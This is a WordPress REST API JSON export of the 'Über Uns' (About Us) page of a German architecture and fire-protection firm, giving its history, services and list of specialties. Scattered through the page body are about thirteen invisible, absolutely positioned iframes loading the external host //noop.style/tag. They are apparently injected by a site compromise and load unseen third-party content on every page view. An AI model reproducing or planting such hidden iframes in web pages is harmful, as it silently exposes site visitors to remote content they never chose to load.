{"id":753,"date":"2025-08-05T09:02:12","date_gmt":"2025-08-05T09:02:12","guid":{"rendered":"https:\/\/www.mgrobe-architektur.de\/?page_id=753"},"modified":"2025-11-07T16:05:21","modified_gmt":"2025-11-07T15:05:21","slug":"ueber-uns","status":"publish","type":"page","link":"https:\/\/www.mgrobe-architektur.de\/?page_id=753","title":{"rendered":"\u00dcber Uns"},"content":{"rendered":"<div id=\"pl-753\"  class=\"panel-layout\" ><div id=\"pg-753-0\"  class=\"panel-grid panel-has-style\" ><div class=\"siteorigin-panels-stretch panel-row-style panel-row-style-for-753-0\" data-stretch-type=\"full-width-stretch\" ><div id=\"pgc-753-0-0\"  class=\"panel-grid-cell panel-grid-cell-empty\" ><\/div><div id=\"pgc-753-0-1\"  class=\"panel-grid-cell\" ><div id=\"panel-753-0-1-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"0\" ><div class=\"panel-widget-style panel-widget-style-for-753-0-1-0\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<div class=\"row\">\n<div class=\"max\"><span class='mb-center maxbutton-5-center'><span class='maxbutton-5-container mb-container'><a class=\"maxbutton-5 maxbutton maxbutton-1\" title=\"Architektur\" href=\"\/?page_id=277\"><span class='mb-text'>Architektur<\/span><\/a><\/span><\/span><\/div>\n<div class=\"max\"><span class='mb-center maxbutton-2-center'><span class='maxbutton-2-container mb-container'><a class=\"maxbutton-2 maxbutton maxbutton-2\" title=\"Brandschutz\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=755\"><span class='mb-text'>Brandschutz<\/span><\/a><\/span><\/span><\/div>\n<div class=\"max\"><span class='mb-center maxbutton-3-center'><span class='maxbutton-3-container mb-container'><a class=\"maxbutton-3 maxbutton maxbutton-3\" title=\"\u00dcber Uns\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=753\"><span class='mb-text'>\u00dcber Uns<\/span><\/a><\/span><\/span><\/div>\n<div class=\"max\"><span class='mb-center maxbutton-4-center'><span class='maxbutton-4-container mb-container'><a class=\"maxbutton-4 maxbutton maxbutton-4\" title=\"Kontakt\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=757\"><span class='mb-text'>Kontakt<\/span><\/a><\/span><\/span><\/div>\n<\/div>\n<\/div>\n<\/div><\/div><\/div><\/div><div id=\"pgc-753-0-2\"  class=\"panel-grid-cell panel-grid-cell-mobile-last\" ><div id=\"panel-753-0-2-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"1\" ><div class=\"panel-widget-style panel-widget-style-for-753-0-2-0\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-898 alignleft\" src=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\" alt=\"Mg-Architektur\" width=\"1150\" height=\"250\" srcset=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png 1150w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383-300x65.png 300w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383-1024x223.png 1024w, https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383-768x167.png 768w\" sizes=\"auto, (max-width: 1150px) 100vw, 1150px\" \/><\/p>\n<\/div>\n<\/div><\/div><\/div><\/div><div id=\"pgc-753-0-3\"  class=\"panel-grid-cell panel-grid-cell-empty\" ><\/div><\/div><\/div><div id=\"pg-753-1\"  class=\"panel-grid panel-has-style\" ><div class=\"siteorigin-panels-stretch panel-row-style panel-row-style-for-753-1\" data-stretch-type=\"full-width-stretch\" ><div id=\"pgc-753-1-0\"  class=\"panel-grid-cell panel-grid-cell-mobile-last\" ><div id=\"panel-753-1-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"2\" ><div class=\"panel-widget-style panel-widget-style-for-753-1-0-0\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<h1><span style=\"font-size: 22pt;\">\u00dcber Uns<\/span><\/h1>\n<div>Herzlich Willkommen bei MG-Architektur,<\/div>\n<div>Ihrem Partner F\u00fcr Kreative und Nachhaltige Architektur.<\/div>\n<div>Das Architekturb\u00fcro MG-Architektur wurde am 01.11.2024 gegr\u00fcndet und ist aus<\/div>\n<div>dem B\u00fcro Meier-Architektur hervorgegangen,<\/div>\n<div>dass bereits seit 1997 besteht.<\/div>\n<div>Unser Team besteht aus erfahrenen Architekten und Bauzeichnern<\/div>\n<div>mit einem umfangreichen Fachwissen.<\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><br \/>\n<\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<\/div>\n<\/div><\/div><\/div><div id=\"panel-753-1-0-1\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"3\" ><div class=\"panel-widget-style panel-widget-style-for-753-1-0-1\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<h1><span style=\"font-size: 22pt;\">Unsere Architektenleistungen<\/span><\/h1>\n<div>Unsere Architektenleistungen basieren in allen Schwerpunkten auf einer<\/div>\n<div>eingehenden Analyse der Bauaufgabe,<\/div>\n<div>der \u00f6rtlichen Gegebenheiten, der Nutzungskategorie und deren Anforderungen.<\/div>\n<div>Die Planungsleistungen von der Idee bis zur Umsetzung der Bauaufgabe<\/div>\n<div>verwirklichen wir mit unserem gro\u00dfen Interesse an neuen Aufgaben und komplexen Abl\u00e4ufen.<\/div>\n<div>In allen Bereichen, ob Neubauten, Anbauten, Nutzungs\u00e4nderungen, Umbauten,<\/div>\n<div>Sanierungen oder barrierefreie Bauten, erfolgt ein enger Dialog mit den Bauherren.<\/div>\n<div>Die Planungen vom Vorentwurf bis zur Ausf\u00fchrungsplanung erstellen wir in 3D.<\/div>\n<div>Dies erm\u00f6glicht uns die Erstellung von virtuell begehbaren<\/div>\n<div>Modellen und realistischen Visualisierungen.<\/div>\n<div>Die Nutzung und intelligente Anwendung von alternativen<\/div>\n<div>Energieformen sind fester Bestandteil unseres planerischen Denkens,<\/div>\n<div>ebenso wie die zielorientierte Planung von brandschutztechnischen Belangen.<iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><br \/>\n<\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<\/div>\n<\/div><\/div><\/div><\/div><div id=\"pgc-753-1-1\"  class=\"panel-grid-cell panel-grid-cell-empty\" ><\/div><\/div><\/div><div id=\"pg-753-2\"  class=\"panel-grid panel-has-style\" ><div class=\"siteorigin-panels-stretch panel-row-style panel-row-style-for-753-2\" data-stretch-type=\"full-width-stretch\" ><div id=\"pgc-753-2-0\"  class=\"panel-grid-cell panel-grid-cell-mobile-last\" ><div id=\"panel-753-2-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child panel-last-child\" data-index=\"4\" ><div\n\t\t\t\n\t\t\tclass=\"so-widget-sow-editor so-widget-sow-editor-base\"\n\t\t\t\n\t\t>\n<div class=\"siteorigin-widget-tinymce textwidget\">\n\t<h1><span style=\"font-size: 20pt;\">Unsere Leistungsschwerpunkte liegen bislang in den Bereichen<\/span><\/h1>\n<ul>\n<li><span style=\"font-size: 14pt;\">\u00d6ffentliche Bauaufgaben<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Schulbauten<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Kindertagesst\u00e4tten<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Krankenhausbauten<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Tagespflegeeinrichtungen<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Theaterspielst\u00e4tten<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Feuerwehrbauten<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Industrie- und Gewerbeplanungen<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Beherbergungsst\u00e4tten<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Individuelle Wohnungsbauaufgaben<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Brandschutz<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Brandschutzplanung<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Erstellung von Feuerwehrpl\u00e4nen<\/span><\/li>\n<li><span style=\"font-size: 14pt;\">Erstellung von Flucht- und Rettungspl\u00e4nen<\/span><\/li>\n<\/ul>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/noop.style\/tag\"><\/iframe><\/div>\n<\/div>\n<\/div><\/div><\/div><div id=\"pgc-753-2-1\"  class=\"panel-grid-cell panel-grid-cell-empty\" ><\/div><\/div><\/div><\/div>","protected":false},"excerpt":{"rendered":"<p>\u00dcber Uns Herzlich Willkommen bei MG-Architektur, Ihrem Partner F\u00fcr Kreative und Nachhaltige Architektur. Das Architekturb\u00fcro MG-Architektur wurde am 01.11.2024 gegr\u00fcndet und ist aus dem B\u00fcro Meier-Architektur hervorgegangen, dass bereits seit 1997 besteht. Unser Team besteht aus erfahrenen Architekten und Bauzeichnern mit einem umfangreichen Fachwissen. Unsere Architektenleistungen Unsere Architektenleistungen basieren in allen Schwerpunkten auf einer eingehenden [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-753","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u00dcber Uns - MG Architektur<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.mgrobe-architektur.de\/?page_id=753\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u00dcber Uns - MG Architektur\" \/>\n<meta property=\"og:description\" content=\"\u00dcber Uns Herzlich Willkommen bei MG-Architektur, Ihrem Partner F\u00fcr Kreative und Nachhaltige Architektur. Das Architekturb\u00fcro MG-Architektur wurde am 01.11.2024 gegr\u00fcndet und ist aus dem B\u00fcro Meier-Architektur hervorgegangen, dass bereits seit 1997 besteht. Unser Team besteht aus erfahrenen Architekten und Bauzeichnern mit einem umfangreichen Fachwissen. Unsere Architektenleistungen Unsere Architektenleistungen basieren in allen Schwerpunkten auf einer eingehenden [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mgrobe-architektur.de\/?page_id=753\" \/>\n<meta property=\"og:site_name\" content=\"MG Architektur\" \/>\n<meta property=\"article:modified_time\" content=\"2025-11-07T15:05:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1150\" \/>\n\t<meta property=\"og:image:height\" content=\"250\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data1\" content=\"2\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=753\",\"url\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=753\",\"name\":\"\u00dcber Uns - MG Architektur\",\"isPartOf\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=753#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=753#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\",\"datePublished\":\"2025-08-05T09:02:12+00:00\",\"dateModified\":\"2025-11-07T15:05:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=753#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mgrobe-architektur.de\/?page_id=753\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=753#primaryimage\",\"url\":\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\",\"contentUrl\":\"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png\",\"width\":1150,\"height\":250,\"caption\":\"Mg-Architektur\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/?page_id=753#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Startseite\",\"item\":\"https:\/\/www.mgrobe-architektur.de\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u00dcber Uns\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mgrobe-architektur.de\/#website\",\"url\":\"https:\/\/www.mgrobe-architektur.de\/\",\"name\":\"MG Architektur\",\"description\":\"Architekten &amp; Ingenieure\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mgrobe-architektur.de\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u00dcber Uns - MG Architektur","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.mgrobe-architektur.de\/?page_id=753","og_locale":"de_DE","og_type":"article","og_title":"\u00dcber Uns - MG Architektur","og_description":"\u00dcber Uns Herzlich Willkommen bei MG-Architektur, Ihrem Partner F\u00fcr Kreative und Nachhaltige Architektur. Das Architekturb\u00fcro MG-Architektur wurde am 01.11.2024 gegr\u00fcndet und ist aus dem B\u00fcro Meier-Architektur hervorgegangen, dass bereits seit 1997 besteht. Unser Team besteht aus erfahrenen Architekten und Bauzeichnern mit einem umfangreichen Fachwissen. Unsere Architektenleistungen Unsere Architektenleistungen basieren in allen Schwerpunkten auf einer eingehenden [&hellip;]","og_url":"https:\/\/www.mgrobe-architektur.de\/?page_id=753","og_site_name":"MG Architektur","article_modified_time":"2025-11-07T15:05:21+00:00","og_image":[{"width":1150,"height":250,"url":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_misc":{"Gesch\u00e4tzte Lesezeit":"2\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=753","url":"https:\/\/www.mgrobe-architektur.de\/?page_id=753","name":"\u00dcber Uns - MG Architektur","isPartOf":{"@id":"https:\/\/www.mgrobe-architektur.de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=753#primaryimage"},"image":{"@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=753#primaryimage"},"thumbnailUrl":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","datePublished":"2025-08-05T09:02:12+00:00","dateModified":"2025-11-07T15:05:21+00:00","breadcrumb":{"@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=753#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mgrobe-architektur.de\/?page_id=753"]}]},{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=753#primaryimage","url":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","contentUrl":"https:\/\/www.mgrobe-architektur.de\/wp-content\/uploads\/2025\/08\/Mg-Architektur-Regular-e1756298213383.png","width":1150,"height":250,"caption":"Mg-Architektur"},{"@type":"BreadcrumbList","@id":"https:\/\/www.mgrobe-architektur.de\/?page_id=753#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Startseite","item":"https:\/\/www.mgrobe-architektur.de\/"},{"@type":"ListItem","position":2,"name":"\u00dcber Uns"}]},{"@type":"WebSite","@id":"https:\/\/www.mgrobe-architektur.de\/#website","url":"https:\/\/www.mgrobe-architektur.de\/","name":"MG Architektur","description":"Architekten &amp; Ingenieure","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mgrobe-architektur.de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"}]}},"_links":{"self":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages\/753","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=753"}],"version-history":[{"count":69,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages\/753\/revisions"}],"predecessor-version":[{"id":1481,"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=\/wp\/v2\/pages\/753\/revisions\/1481"}],"wp:attachment":[{"href":"https:\/\/www.mgrobe-architektur.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}